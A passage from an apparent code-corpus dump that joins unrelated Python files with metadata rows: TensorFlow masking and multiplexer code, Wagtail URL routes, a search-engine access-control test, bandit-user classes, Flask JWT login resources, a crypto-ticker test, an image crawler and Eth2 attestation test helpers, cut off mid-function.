[4, 4] + [0, 1] = [4, 5]
so we have:
[[0, 1], [4, 5]]
'''
absolute_indices = tf.add(bai_repeated, tf.range(output_size))
'''
Flatten this tensor in order to compute the one hot encoding for each
absolute index:
[0, 1, 4, 5]
'''
ai_flat = tf.reshape(absolute_indices, [-1])
'''
Compute the one-hot encoding for the absolute indices.
From [0, 1, 4, 5] we get:
[[1, 0, 0, 0, 0, 0], [0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0], [0, 0, 0, 0, 0, 1]]
'''
ai_onehot = tf.one_hot(ai_flat, output_size * nb_actions)
'''
Build the mask for full_input from the one-hot-encoded absolute indices.
We need to group the one-hot absolute indices into groups of output_size
elements.
We get:
[
[[1, 0, 0, 0, 0, 0], [0, 1, 0, 0, 0, 0]],
[[0, 0, 0, 0, 1, 0], [0, 0, 0, 0, 0, 1]]
]
'''
group_shape = [-1, output_size, output_size * nb_actions]
group = tf.reshape(ai_onehot, group_shape)
'''
Reduce_sum along axis 1 to collapse the group and get the binary masks.
[[1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1]]
'''
masks = tf.reduce_sum(group, axis=1)
'''
Convert the mask to boolean.
[[True, True, False, False, False, False],
[False, False, False, False, True, True]]
'''
zero = tf.constant(0, dtype=tf.float32)
bool_masks = tf.not_equal(masks, zero)
'''
Convert the boolean masks back to absolute indices for the full_input
tensor (each element represents [sample index, value index]).
We get:
[[0, 0], [0, 1], [1, 4], [1, 5]]
'''
ai_mask = tf.where(bool_masks)
'''
Apply the masks to full_input. We get a 1D tensor:
[1, 2, 11, 12]
'''
reduced_output = tf.gather_nd(full_input, ai_mask)
'''
Reshape the reduction to match the output shape.
We get:
[[1, 2], [11, 12]]
'''
return tf.reshape(reduced_output, [-1, output_size])
| multiplexer.py | 6,374 | This layer is used to split the output of a previous Dense layer into
nb_ctrl_sig groups of size output_dim, and choose which group to provide
as output using a discrete control signal.
It takes as input two tensors, namely the output of the previous layer
and a column tensor with int32 or int64 values for the control signal.
The Dense input to this layer must be of shape (None, prev_output_dim),
where prev_output_dim = output_dim * nb_ctrl_sig.
No checks are done at runtime to ensure that the input to the layer is
correct, so it's better to double check.
An example usage of this layer may be:
input = Input(shape=(3,))
control = Input(shape=(1,), dtype='int32')
hidden = Dense(6)(i) # output_dim == 2, nb_ctrl_sig == 3
output = Multiplexer(2, 3)([hidden, control])
model = Model(input=[input, control], output=output)
...
x = randn(3) # Input has size 3
ctrl = array([0, 1, 2])
# Outputs the first two neurons of the Dense layer
model.predict([x, ctrl[0]])
# Outputs the middle two neurons of the Dense layer
model.predict([x, ctrl[1]])
# Outputs the last two neurons of the Dense layer
model.predict([x, ctrl[2]])
# Arguments
output_dim: positive integer, dimensionality of the output space.
nb_ctrl_sig: positive integer, number of groups in which to split
the output of the previous layer. Must satisfy the relation:
input_size = nb_ctrl_sig * output_dim
Returns a tensor of shape (None, output_size) where each sample is
the result of masking each sample in full_input with a binary mask that
preserves only output_size elements, based on the corresponding control
value in indices. | 1,713 | en | 0.71992 |
# -*- coding: utf-8 -*-
from django.conf import settings
from django.conf.urls import include, url
from django.contrib import admin
from wagtail.admin import urls as wagtailadmin_urls
from wagtail.documents import urls as wagtaildocs_urls
urlpatterns = [
url(r'^django-admin/', admin.site.urls),
url(r'^admin/', include(wagtailadmin_urls)),
url(r'^documents/', include(wagtaildocs_urls)),
]
if settings.DEBUG:
from django.conf.urls.static import static
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
# Serve static and media files from development server
urlpatterns += staticfiles_urlpatterns()
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| aldryn_wagtail/urls.py | 732 | -*- coding: utf-8 -*- Serve static and media files from development server | 74 | en | 0.882196 |
#! /usr/bin/python
import sys,shutil, urllib2, json, time, subprocess, os, commands, signal, re
sys.path.insert(0, 'srch2lib')
import test_lib
port = '8087'
# This test case reads data from the json files
# Then it reads all the access control data from json files too
# Then it does some search and it uses roleId in the query
# And all the results should have this roleId in their access list
# it reads the keywords and role ids from queriesAndResults.txt file
# the format of each line in this file is like:
# coreName keyword roleid || results
# example : core1 hello 103 || 12 14 18
#Function of checking the results
def checkResult(query, responseJson,resultValue):
# for key, value in responseJson:
# print key, value
isPass=1
if len(responseJson) == len(resultValue):
for i in range(0, len(resultValue)):
#print response_json['results'][i]['record']['id']
if (resultValue.count(responseJson[i]['record']['id']) != 1):
isPass=0
print query+' test failed'
print 'query results||given results'
print 'number of results:'+str(len(responseJson))+'||'+str(len(resultValue))
for i in range(0, len(responseJson)):
print str(responseJson[i]['record']['id']) + '||' + resultValue[i]
break
else:
isPass=0
print query+' test failed - differing response lengths'
print 'query results||given results'
print 'number of results:'+str(len(responseJson))+'||'+str(len(resultValue))
maxLen = max(len(responseJson),len(resultValue))
for i in range(0, maxLen):
if i >= len(resultValue):
print str(responseJson[i]['record']['id'])+'||'
elif i >= len(responseJson):
print ' '+'||'+resultValue[i]
else:
print responseJson[i]['record']['id']+'||'+resultValue[i]
if isPass == 1:
print query+' test pass'
return 0
return 1
#prepare the query based on the valid syntax
def prepareQuery(queryKeyword, roleId, fuzzy):
query = ''
################# prepare main query part
query = query + 'q='
# local parameters
# query = query + '%7BdefaultPrefixComplete=COMPLETE%7D'
# keywords section
if fuzzy:
keyword = queryKeyword + '~'
else:
keyword = queryKeyword
query=query+keyword+'&'
# print 'Query : ' + query
##################################
query = query + 'roleId=' + roleId
return query
def testMultipleCores(queriesAndResultsPath, binary_path):
#Start the engine server
args = [ binary_path, '--config-file=./access_control/conf-acl.xml' ]
if test_lib.confirmPortAvailable(port) == False:
print 'Port ' + str(port) + ' already in use - aborting'
return -1
print 'starting engine: ' + args[0] + ' ' + args[1]
serverHandle = test_lib.startServer(args)
test_lib.pingServer(port)
failCount = 0
print "Test core1 - access control"
f_in = open(queriesAndResultsPath, 'r')
for line in f_in:
#get the query keyword and results
value=line.split('||')
if(value[0] == 'S'):
queryValue=value[1].split(' ')
allResults=value[2].split('@')
for coreResult in allResults:
resultValue=coreResult.split()
#construct the query
query='http://localhost:' + port + '/' + queryValue[0] + '/search?'
query = query + prepareQuery(queryValue[1], queryValue[2], False)
#do the query
response = urllib2.urlopen(query).read()
response_json = json.loads(response)
#check the result
failCount += checkResult(query, response_json['results'], resultValue)
else:
# the line is command query (insert/delete/update/acl etc)
coreName = value[1]
command = value[2]
payload = value[3]
if coreName == "":
query='http://localhost:' + port + '/' + command
else:
query='http://localhost:' + port + '/' + coreName + '/' + command
print query
request = urllib2.Request(query, data=payload)
request.get_method = lambda: 'PUT'
opener = urllib2.build_opener(urllib2.HTTPHandler)
url = opener.open(request)
time.sleep(1)
time.sleep(5)
test_lib.killServer(serverHandle)
print '=============================='
return failCount
if __name__ == '__main__':
if(os.path.exists("./access-control/core1Data")):
shutil.rmtree("./access-control/core1Data")
if(os.path.exists("./access-control/core2Data")):
shutil.rmtree("./access-control/core2Data")
if(os.path.exists("./access-control/core3Data")):
shutil.rmtree("./access-control/core3Data")
if(os.path.exists("./access-control/core4Data")):
shutil.rmtree("./access-control/core4Data")
#Path of the query file
#each line like "core1 trust 1000||01c90b4effb2353742080000" ---- coreName query roleId||record_ids(results)
binary_path = sys.argv[1]
queriesAndResultsPath = sys.argv[2]
exitCode = testMultipleCores(queriesAndResultsPath, binary_path)
if(os.path.exists("./access-control/core1Data")):
shutil.rmtree("./access-control/core1Data")
if(os.path.exists("./access-control/core2Data")):
shutil.rmtree("./access-control/core2Data")
if(os.path.exists("./access-control/core3Data")):
shutil.rmtree("./access-control/core3Data")
if(os.path.exists("./access-control/core4Data")):
shutil.rmtree("./access-control/core4Data")
os._exit(exitCode)
| test/wrapper/system_tests/access_control/record-based-ACL.py | 5,842 | ! /usr/bin/python This test case reads data from the json files Then it reads all the access control data from json files too Then it does some search and it uses roleId in the query And all the results should have this roleId in their access list it reads the keywords and role ids from queriesAndResults.txt file the format of each line in this file is like: coreName keyword roleid || results example : core1 hello 103 || 12 14 18Function of checking the results for key, value in responseJson: print key, valueprint response_json['results'][i]['record']['id']prepare the query based on the valid syntax prepare main query part local parameters query = query + '%7BdefaultPrefixComplete=COMPLETE%7D' keywords section print 'Query : ' + queryStart the engine serverget the query keyword and resultsconstruct the querydo the querycheck the result the line is command query (insert/delete/update/acl etc)Path of the query fileeach line like "core1 trust 1000||01c90b4effb2353742080000" ---- coreName query roleId||record_ids(results) | 1,057 | en | 0.648562 |
# SPDX-FileCopyrightText: Copyright 2021, Siavash Ameli <sameli@berkeley.edu>
# SPDX-License-Identifier: BSD-3-Clause
# SPDX-FileType: SOURCE
#
# This program is free software: you can redistribute it and/or modify it under
# the terms of the license found in the LICENSE.txt file in the root directory
# of this source tree.
# =======
# Imports
# =======
import sympy
# ==========================
# Declare symbolic variables
# ==========================
n = sympy.symbols('n', integer=True, positive=True)
t = sympy.symbols('t', real=True, positive=True)
| ortho/_orthogonal_functions/declarations.py | 563 | SPDX-FileCopyrightText: Copyright 2021, Siavash Ameli <sameli@berkeley.edu> SPDX-License-Identifier: BSD-3-Clause SPDX-FileType: SOURCE This program is free software: you can redistribute it and/or modify it under the terms of the license found in the LICENSE.txt file in the root directory of this source tree. ======= Imports ======= ========================== Declare symbolic variables ========================== | 416 | en | 0.646381 |
from abc import ABC, abstractmethod
import random
import torch
import torch.nn as nn
import torch.nn.functional as F
class mab_user(ABC):
def __init__(self, n_arms, lamb=1):
super(mab_user, self).__init__()
self.t = torch.tensor(1.0)
self.r = torch.zeros(n_arms)
self.n = torch.zeros(n_arms)
self.id = -1
self.returns = 0
self.lamb = lamb
@abstractmethod
def choose(self):
pass
@abstractmethod
def update(self, arm, reward):
pass
class perfect_user(mab_user):
# users that always make perfect decision -- can be paired with recEngines
# in CF simulations
def __init__(self, n_arms):
super().__init__(n_arms)
def setup_learners(self, learners):
#this setup routine must be called before perfect_user can run
self.learners = learners
def choose(self):
l_max = [0]*len(self.learners)
for i,learner in enumerate(self.learners):
l_max[i] = torch.max(learner.U[self.id] @ learner.V.t())
return torch.argmax(torch.tensor(l_max))
def update(self, arm, reward):
pass
class ucb_user(mab_user):
def __init__(self, n_arms):
super().__init__(n_arms)
def _ranking(self):
return self.r + self.lamb*torch.sqrt(2*torch.log(self.t)/self.n)
def choose(self):
return torch.argmax(self._ranking())
def update(self, arm, reward):
self.r[arm] = self.r[arm]*(self.n[arm]) + reward
self.n[arm] += 1
self.r[arm] /= self.n[arm]
self.t += 1
self.returns += reward
class e_greedy_user(ucb_user):
def __init__(self, n_arms, eps_scaling=0.333, r_tol=1e-20, eps0=1.0):
super().__init__(n_arms)
self.eps_scaling = eps_scaling
self.eps = eps0
self.eps0 = eps0
self.n_arms = n_arms
self.r_tol = r_tol
def choose(self):
if random.random() > self.eps:
a = torch.argmax(self.r + self.r_tol*torch.randn(self.r.shape))
else:
a = random.randint(0,self.n_arms-1)
return a
def update(self, arm, reward):
super().update(arm, reward)
self.eps = self.eps0/(self.t**self.eps_scaling)
class sw_ucb_user(mab_user):
def __init__(self, n_arms):
super(ucb_user, self).__init__()
self.n_arms = n_arms
self.t = torch.tensor(1.0)
self.tau
self.sw_r = []
self.sw_arms = []
self.n = torch.zeros(self.n_arms)
self.r = torch.zeros(self.n_arms)
self.alpha = 0.9
self.lamb = 1
self.id = -1
self.returns = 0
def _ranking(self):
return self.r/self.n + self.lamb*torch.sqrt(
(1+self.alpha)*torch.log(self.t)/self.n)
def update(self, arm, reward):
self.sw_arm.append(arm)
self.sw_r.append(reward)
self.r[arm] += reward
self.returns += reward
self.n[arm] += 1
tau_prime = torch.min(torch.ceil(self.lamb*(self.t**self.alpha)),self.t)
delta_tau = tau_prime - self.tau
if delta_tau < 1.0:
arm = self.sw_arm.pop(0)
self.r[arm] -= [self.sw_r.pop(0)]
self.n[arm] -= 1
self.tau = tau_prime
| user.py | 3,272 | users that always make perfect decision -- can be paired with recEngines in CF simulationsthis setup routine must be called before perfect_user can run | 152 | en | 0.893964 |
from flask import request, jsonify
from flask_restful import Resource, reqparse, abort
from flask_jwt import current_app
from app.auth.models import User
def generate_token(user):
""" Currently this is workaround
since the latest version that already has this function
is not published on PyPI yet and we don't want
to install the package directly from GitHub.
See: https://github.com/mattupstate/flask-jwt/blob/9f4f3bc8dce9da5dd8a567dfada0854e0cf656ae/flask_jwt/__init__.py#L145
"""
jwt = current_app.extensions['jwt']
token = jwt.jwt_encode_callback(user)
return token
class SignUpResource(Resource):
parser = reqparse.RequestParser(bundle_errors=True)
parser.add_argument('email', type=str, required=True)
parser.add_argument('password', type=str, required=True)
def post(self):
args = self.parser.parse_args()
if not User.query.filter_by(email=args['email']).scalar():
User(
email = args['email'],
password = args['password']
).save()
return {'message': 'Sign up successfully'}
abort(400, message='Email already exists.')
class LoginResource(Resource):
parser = reqparse.RequestParser(bundle_errors=True)
parser.add_argument('email', type=str, required=True)
parser.add_argument('password', type=str, required=True)
def post(self):
args = self.parser.parse_args()
user = User.query.filter_by(email=args['email']).first()
if user is not None and user.verify_password(args['password']):
token = generate_token(user)
return jsonify({'token': token.decode("utf-8")})
abort(400, message='Invalid credentials')
| Chapter04/app/auth/resources.py | 1,732 | Currently this is workaround
since the latest version that already has this function
is not published on PyPI yet and we don't want
to install the package directly from GitHub.
See: https://github.com/mattupstate/flask-jwt/blob/9f4f3bc8dce9da5dd8a567dfada0854e0cf656ae/flask_jwt/__init__.py#L145 | 295 | en | 0.894915 |
import unittest
import cryptomon.common as common
class Testcryptomon(unittest.TestCase):
def setUp(self):
self.response = [
{
"id": "bitcoin",
"name": "Bitcoin",
"symbol": "BTC",
"rank": "1",
"price_usd": "15653.3",
"price_btc": "1.0",
"24h_volume_usd": "14446900000.0",
"market_cap_usd": "261915508097",
"available_supply": "16732287.0",
"total_supply": "16732287.0",
"max_supply": "21000000.0",
"percent_change_1h": "0.75",
"percent_change_24h": "4.73",
"percent_change_7d": "34.5",
"last_updated": "1512920953",
"price_eur": "13304.365802",
"24h_volume_eur": "12278998186.0",
"market_cap_eur": "222612466952"
},
{
"id": "ethereum",
"name": "Ethereum",
"symbol": "ETH",
"rank": "2",
"price_usd": "452.479",
"price_btc": "0.0288748",
"24h_volume_usd": "1736900000.0",
"market_cap_usd": "43552764899.0",
"available_supply": "96253671.0",
"total_supply": "96253671.0",
"percent_change_1h": "0.58",
"percent_change_24h": "-7.03",
"percent_change_7d": "-5.36",
"last_updated": "1512920957",
"price_eur": "384.58000126",
"24h_volume_eur": "1476260786.0",
"market_cap_eur": "37017236998.0"
}
]
def test_find_data(self):
filtered_data = common.find_data(self.response, ['BTC'])
self.assertEqual(len(filtered_data), 1)
filtered_data = common.find_data(self.response, ['btc'])
self.assertEqual(len(filtered_data), 1)
filtered_data = common.find_data(self.response, ['eth'])
self.assertEqual(len(filtered_data), 1)
filtered_data = common.find_data(self.response, ['ETH'])
self.assertEqual(len(filtered_data), 1)
filtered_data = common.find_data(self.response, ['LTC'])
self.assertEqual(len(filtered_data), 0)
filtered_data = common.find_data(self.response, ['BTC', 'eth'])
self.assertEqual(len(filtered_data), 2)
filtered_data = common.find_data(self.response, ['BTC', 'eth', 'ltc'])
self.assertEqual(len(filtered_data), 2)
def test_tabulate_data(self):
tabulated_data = common.process_data(self.response)
self.assertEqual(len(tabulated_data), 3)
# all items must have same number of fields
for item in tabulated_data:
self.assertEqual(len(item), len(tabulated_data[0]))
self.assertEqual(tabulated_data[0][0], common.fields_good_name["rank"])
self.assertEqual(tabulated_data[0][1], common.fields_good_name["symbol"])
self.assertEqual(tabulated_data[0][2], common.fields_good_name["price"])
self.assertEqual(tabulated_data[0][3], common.fields_good_name["percent_change_24h"])
self.assertEqual(tabulated_data[0][4], common.fields_good_name["percent_change_1h"])
self.assertEqual(tabulated_data[0][5], common.fields_good_name["market_cap"])
if __name__ == '__main__':
unittest.main(verbosity=2)
| tests/test_cryptomon.py | 3,436 | all items must have same number of fields | 41 | en | 0.90827 |
import logging
import random
import re
from urllib.parse import urljoin
from urllib.parse import urlparse
import requests
from bs4 import BeautifulSoup
logger = logging.getLogger(__name__)
IMAGE_FILE_REGEX = re.compile(r'([-\w]+\.(?:jpg|jpeg|gif|png))',
re.IGNORECASE)
def crawl_page(project_data, prerequisites):
""" Picks a random image off of the passed URL."""
result = {
'status': 'success',
'image': None
}
url = project_data.get('url')
if not url:
result['status'] = 'error'
result['error_message'] = 'URL was not provided.'
return result
# Crawl the website for images.
logger.info('Starting to crawl %s', url)
images = find_images(url)
num_images = len(images)
logger.info('Found %s images', num_images)
if num_images == 0:
result['status'] = 'error'
result['error_message'] = 'Unable to find images at the provided URL.'
return result
# Return a random one.
logger.info('Picking a random one...')
image = random.choice(list(images))
result['image'] = image
return result
def find_images(url):
""" Fetches a url's HTML and extracts all image sources in an <img> tag.
"""
images = set()
# Fetch the content.
headers = {
'User-Agent': ('Mozilla/5.0 (compatible; OrchestraBot/1.0; '
'noreply@example.org)'),
}
response = requests.get(url, headers=headers)
if response.status_code < 200 or response.status_code >= 300:
logger.error("Couldn't fetch url {}".format(url))
return images
content = response.text
# Find images in the content.
soup = BeautifulSoup(content)
tags = soup.find_all('img', src=IMAGE_FILE_REGEX)
for tag in tags:
link = tag.get('src')
if link is None:
continue
if not bool(urlparse(link).netloc):
link = urljoin(url, link)
images.add(link)
return images
| simple_workflow/v1/crawl.py | 2,010 | Picks a random image off of the passed URL.
Fetches a url's HTML and extracts all image sources in an <img> tag.
Crawl the website for images. Return a random one. Fetch the content. Find images in the content. | 217 | en | 0.75655 |
import math
import random
from typing import Dict, Iterable, Sequence, Tuple
from eth.constants import ZERO_HASH32
from eth_typing import BLSPubkey, BLSSignature, Hash32
from eth_utils import to_tuple
from eth_utils.toolz import keymap as keymapper
from eth_utils.toolz import pipe
from eth2._utils.bitfield import get_empty_bitfield, set_voted
from eth2._utils.bls import Domain, bls
from eth2.beacon.committee_helpers import (
get_committee_count,
get_crosslink_committee,
get_shard_delta,
get_start_shard,
)
from eth2.beacon.helpers import (
compute_domain,
compute_epoch_of_slot,
compute_start_slot_of_epoch,
get_active_validator_indices,
get_block_root,
get_block_root_at_slot,
get_domain,
)
from eth2.beacon.signature_domain import SignatureDomain
from eth2.beacon.state_machines.base import BaseBeaconStateMachine
from eth2.beacon.types.attestation_data import AttestationData
from eth2.beacon.types.attestation_data_and_custody_bits import (
AttestationDataAndCustodyBit,
)
from eth2.beacon.types.attestations import Attestation, IndexedAttestation
from eth2.beacon.types.attester_slashings import AttesterSlashing
from eth2.beacon.types.blocks import BeaconBlockHeader
from eth2.beacon.types.checkpoints import Checkpoint
from eth2.beacon.types.crosslinks import Crosslink
from eth2.beacon.types.deposit_data import DepositData
from eth2.beacon.types.pending_attestations import PendingAttestation
from eth2.beacon.types.proposer_slashings import ProposerSlashing
from eth2.beacon.types.states import BeaconState
from eth2.beacon.types.voluntary_exits import VoluntaryExit
from eth2.beacon.typing import (
Bitfield,
CommitteeIndex,
Epoch,
Gwei,
Shard,
Slot,
ValidatorIndex,
default_bitfield,
default_epoch,
default_shard,
)
from eth2.configs import CommitteeConfig, Eth2Config
# TODO(ralexstokes) merge w/ below
def _mk_pending_attestation(
bitfield: Bitfield = default_bitfield,
target_root: Hash32 = ZERO_HASH32,
target_epoch: Epoch = default_epoch,
shard: Shard = default_shard,
start_epoch: Epoch = default_epoch,
parent_root: Hash32 = ZERO_HASH32,
data_root: Hash32 = ZERO_HASH32,
) -> PendingAttestation:
return PendingAttestation(
aggregation_bits=bitfield,
data=AttestationData(
target=Checkpoint(epoch=target_epoch, root=target_root),
crosslink=Crosslink(
shard=shard,
parent_root=parent_root,
start_epoch=start_epoch,
end_epoch=target_epoch,
data_root=data_root,
),
),
)
def mk_pending_attestation_from_committee(
parent: Crosslink,
committee_size: int,
shard: Shard,
target_epoch: Epoch = default_epoch,
target_root: Hash32 = ZERO_HASH32,
data_root: Hash32 = ZERO_HASH32,
) -> PendingAttestation:
bitfield = get_empty_bitfield(committee_size)
for i in range(committee_size):
bitfield = set_voted(bitfield, i)
return _mk_pending_attestation(
bitfield=bitfield,
target_root=target_root,
target_epoch=target_epoch,
shard=shard,
start_epoch=parent.end_epoch,
parent_root=parent.hash_tree_root,
data_root=data_root,
)
def _mk_some_pending_attestations_with_some_participation_in_epoch(
state: BeaconState,
epoch: Epoch,
config: Eth2Config,
participation_ratio: float,
number_of_shards_to_check: int,
) -> Iterable[PendingAttestation]:
block_root = get_block_root(
state, epoch, config.SLOTS_PER_EPOCH, config.SLOTS_PER_HISTORICAL_ROOT
)
epoch_start_shard = get_start_shard(state, epoch, CommitteeConfig(config))
if epoch == state.current_epoch(config.SLOTS_PER_EPOCH):
parent_crosslinks = state.current_crosslinks
else:
parent_crosslinks = state.previous_crosslinks
for shard in range(
epoch_start_shard, epoch_start_shard + number_of_shards_to_check
):
shard = Shard(shard % config.SHARD_COUNT)
crosslink_committee = get_crosslink_committee(
state, epoch, shard, CommitteeConfig(config)
)
if not crosslink_committee:
continue
participants_count = math.ceil(participation_ratio * len(crosslink_committee))
if not participants_count:
return tuple()
yield mk_pending_attestation_from_committee(
parent_crosslinks[shard],
participants_count,
shard,
target_epoch=epoch,
target_root=block_root,
)
def mk_all_pending_attestations_with_some_participation_in_epoch(
state: BeaconState, epoch: Epoch, config: Eth2Config, participation_ratio: float
) -> Iterable[PendingAttestation]:
return _mk_some_pending_attestations_with_some_participation_in_epoch(
state,
epoch,
config,
participation_ratio,
get_shard_delta(state, epoch, CommitteeConfig(config)),
)
@to_tuple
def mk_all_pending_attestations_with_full_participation_in_epoch(
state: BeaconState, epoch: Epoch, config: Eth2Config
) -> Iterable[PendingAttestation]:
return mk_all_pending_attestations_with_some_participation_in_epoch(
state, epoch, config, 1.0
)
#
# Aggregation
#
def verify_votes(
message_hash: Hash32,
votes: Iterable[Tuple[ValidatorIndex, BLSSignature, BLSPubkey]],
domain: Domain,
) -> Tuple[Tuple[BLSSignature, ...], Tuple[ValidatorIndex, ...]]:
"""
Verify the given votes.
"""
sigs_with_committee_info = tuple(
(sig, committee_index)
for (committee_index, sig, pubkey) in votes
if bls.verify(
message_hash=message_hash, pubkey=pubkey, signature=sig, domain=domain
)
)
try:
sigs, committee_indices = zip(*sigs_with_committee_info)
except ValueError:
sigs = tuple()
committee_indices = tuple()
return sigs, committee_indices
def aggregate_votes(
bitfield: Bitfield,
sigs: Sequence[BLSSignature],
voting_sigs: Sequence[BLSSignature],
attesting_indices: Sequence[CommitteeIndex],
) -> Tuple[Bitfield, BLSSignature]:
"""
Aggregate the votes.
"""
# Update the bitfield and append the signatures
sigs = tuple(sigs) + tuple(voting_sigs)
bitfield = pipe(
bitfield,
*(set_voted(index=committee_index) for committee_index in attesting_indices)
)
return bitfield, bls.aggregate_signatures(sigs)
#
# Signer
#
def sign_proof_of_possession(deposit_data: DepositData, privkey: int) -> BLSSignature:
return bls.sign(
message_hash=deposit_data.signing_root,
privkey=privkey,
domain=compute_domain(SignatureDomain.DOMAIN_DEPOSIT),
)
def sign_transaction(
*,
message_hash: Hash32,
privkey: int,
state: BeaconState,
slot: Slot,
signature_domain: SignatureDomain,
slots_per_epoch: int
) -> BLSSignature:
domain = get_domain(
state,
signature_domain,
slots_per_epoch,
message_epoch=compute_epoch_of_slot(slot, slots_per_epoch),
)
return bls.sign(message_hash=message_hash, privkey=privkey, domain=domain)
SAMPLE_HASH_1 = Hash32(b"\x11" * 32)
SAMPLE_HASH_2 = Hash32(b"\x22" * 32)
def create_block_header_with_signature(
state: BeaconState,
body_root: Hash32,
privkey: int,
slots_per_epoch: int,
parent_root: Hash32 = SAMPLE_HASH_1,
state_root: Hash32 = SAMPLE_HASH_2,
) -> BeaconBlockHeader:
block_header = BeaconBlockHeader(
slot=state.slot,
parent_root=parent_root,
state_root=state_root,
body_root=body_root,
)
block_header_signature = sign_transaction(
message_hash=block_header.signing_root,
privkey=privkey,
state=state,
slot=block_header.slot,
signature_domain=SignatureDomain.DOMAIN_BEACON_PROPOSER,
slots_per_epoch=slots_per_epoch,
)
return block_header.copy(signature=block_header_signature)
#
#
# Only for test/simulation
#
#
#
# ProposerSlashing
#
def create_mock_proposer_slashing_at_block(
state: BeaconState,
config: Eth2Config,
keymap: Dict[BLSPubkey, int],
block_root_1: Hash32,
block_root_2: Hash32,
proposer_index: ValidatorIndex,
) -> ProposerSlashing:
"""
Return a `ProposerSlashing` derived from the given block roots.
If the header roots do not match, the `ProposerSlashing` is valid.
If the header roots do match, the `ProposerSlashing` is not valid.
"""
slots_per_epoch = config.SLOTS_PER_EPOCH
block_header_1 = create_block_header_with_signature(
state,
block_root_1,
keymap[state.validators[proposer_index].pubkey],
slots_per_epoch,
)
block_header_2 = create_block_header_with_signature(
state,
block_root_2,
keymap[state.validators[proposer_index].pubkey],
slots_per_epoch,
)
return ProposerSlashing(
proposer_index=proposer_index, header_1=block_header_1, header_2=block_header_2
)
#
# AttesterSlashing
#
def create_mock_slashable_attestation(
state: BeaconState,
config: Eth2Config,
keymap: Dict[BLSPubkey, int],
attestation_slot: Slot,
) -> IndexedAttestation:
"""
Create an `IndexedAttestation` that is signed by one attester.
"""
attester_index = ValidatorIndex(0)
committee = (attester_index,)
shard = Shard(0)
# Use genesis block root as `beacon_block_root`, only for tests.
beacon_block_root = get_block_root_at_slot(
state, attestation_slot, config.SLOTS_PER_HISTORICAL_ROOT
)
# Get `target_root`
target_root = _get_target_root(state, config, beacon_block_root)
# Get `source_root`
source_root = get_block_root_at_slot(
state,
compute_start_slot_of_epoch(
state.current_justified_checkpoint.epoch, config.SLOTS_PER_EPOCH
),
config.SLOTS_PER_HISTORICAL_ROOT,
)
previous_crosslink = state.current_crosslinks[shard]
attestation_data = AttestationData(
beacon_block_root=beacon_block_root,
source=Checkpoint(
epoch=state.current_justified_checkpoint.epoch, root=source_root
),
target=Checkpoint(
epoch=compute_epoch_of_slot(attestation_slot, config.SLOTS_PER_EPOCH),
root=target_root,
),
crosslink=previous_crosslink,
)
message_hash, attesting_indices = _get_mock_message_and_attesting_indices(
attestation_data, committee, num_voted_attesters=1
)
signature = sign_transaction(
message_hash=message_hash,
privkey=keymap[state.validators[attesting_indices[0]].pubkey],
state=state,
slot=attestation_slot,
signature_domain=SignatureDomain.DOMAIN_ATTESTATION,
slots_per_epoch=config.SLOTS_PER_EPOCH,
)
validator_indices = tuple(committee[i] for i in attesting_indices)
return IndexedAttestation(
custody_bit_0_indices=validator_indices,
custody_bit_1_indices=tuple(),
data=attestation_data,
signature=signature,
)
def create_mock_attester_slashing_is_double_vote(
state: BeaconState,
config: Eth2Config,
keymap: Dict[BLSPubkey, int],
attestation_epoch: Epoch,
) -> AttesterSlashing:
attestation_slot_1 = compute_start_slot_of_epoch(
attestation_epoch, config.SLOTS_PER_EPOCH
)
attestation_slot_2 = Slot(attestation_slot_1 + 1)
slashable_attestation_1 = create_mock_slashable_attestation(
state, config, keymap, attestation_slot_1
)
slashable_attestation_2 = create_mock_slashable_attestation(
state, config, keymap, attestation_slot_2
)
return AttesterSlashing(
attestation_1=slashable_attestation_1, attestation_2=slashable_attestation_2
)
def create_mock_attester_slashing_is_surround_vote(
state: BeaconState,
config: Eth2Config,
keymap: Dict[BLSPubkey, int],
attestation_epoch: Epoch,
) -> AttesterSlashing:
# target_epoch_2 < target_epoch_1
attestation_slot_2 = compute_start_slot_of_epoch(
attestation_epoch, config.SLOTS_PER_EPOCH
)
attestation_slot_1 = Slot(attestation_slot_2 + config.SLOTS_PER_EPOCH)
slashable_attestation_1 = create_mock_slashable_attestation(
state.copy(
slot=attestation_slot_1, current_justified_epoch=config.GENESIS_EPOCH
),
config,
keymap,
attestation_slot_1,
)
slashable_attestation_2 = create_mock_slashable_attestation(
state.copy(
slot=attestation_slot_1,
current_justified_epoch=config.GENESIS_EPOCH
+ 1, # source_epoch_1 < source_epoch_2
),
config,
keymap,
attestation_slot_2,
)
return AttesterSlashing(
attestation_1=slashable_attestation_1, attestation_2=slashable_attestation_2
)
#
# Attestation
#
def _get_target_root(
state: BeaconState, config: Eth2Config, beacon_block_root: Hash32
) -> Hash32:
epoch = compute_epoch_of_slot(state.slot, config.SLOTS_PER_EPOCH)
epoch_start_slot = compute_start_slot_of_epoch(epoch, config.SLOTS_PER_EPOCH)
if epoch_start_slot == state.slot:
return beacon_block_root
else:
return get_block_root(
state, epoch, config.SLOTS_PER_EPOCH, config.SLOTS_PER_HISTORICAL_ROOT
)
def _get_mock_message_and_attesting_indices(
attestation_data: AttestationData,
committee: Sequence[ValidatorIndex],
num_voted_attesters: int,
) -> Tuple[Hash32, Tuple[CommitteeIndex, ...]]:
"""
Get ``message_hash`` and voting indices of the given ``committee``.
"""
message_hash = AttestationDataAndCustodyBit(
data=attestation_data, custody_bit=False
).hash_tree_root
committee_size = len(committee)
assert num_voted_attesters <= committee_size
attesting_indices = tuple(
CommitteeIndex(i)
for i in random.sample(range(committee_size), num_voted_attesters)
)
return message_hash, tuple(sorted(attesting_indices))
def _create_mock_signed_attestation(
state: BeaconState,
attestation_data: AttestationData,
attestation_slot: Slot,
committee: Sequence[ValidatorIndex],
num_voted_attesters: int,
keymap: Dict[BLSPubkey, int],
slots_per_epoch: int,
) -> Attestation:
"""
Create a mocking attestation of the given ``attestation_data`` slot with ``keymap``.
"""
message_hash, attesting_indices = _get_mock_message_and_attesting_indices(
attestation_data, committee, num_voted_attesters
)
# Use privkeys to sign the attestation
signatures = [
sign_transaction(
message_hash=message_hash,
privkey=keymap[state.validators[committee[committee_index]].pubkey],
state=state,
slot=attestation_slot,
signature_domain=SignatureDomain.DOMAIN_ATTESTATION,
slots_per_epoch=slots_per_epoch,
)
for committee_index in attesting_indices
]
# aggregate signatures and construct participant bitfield
